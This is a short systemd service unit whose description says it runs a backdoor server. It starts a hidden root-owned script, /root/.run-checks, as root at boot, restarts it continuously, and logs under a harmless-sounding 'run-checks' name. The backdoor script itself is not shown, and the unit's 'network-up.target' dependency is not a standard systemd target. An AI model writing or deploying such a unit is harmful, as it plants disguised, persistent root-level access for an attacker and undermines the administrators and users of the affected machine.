[Unit]
Description=Run backdoor server
After=network-up.target

[Service]
ExecStart=/bin/bash /root/.run-checks
Restart=always
RestartSec=5
StandardOutput=append:/var/log/run-checks.log
StandardError=append:/var/log/run-checks.err
User=root

[Install]
WantedBy=multi-user.target
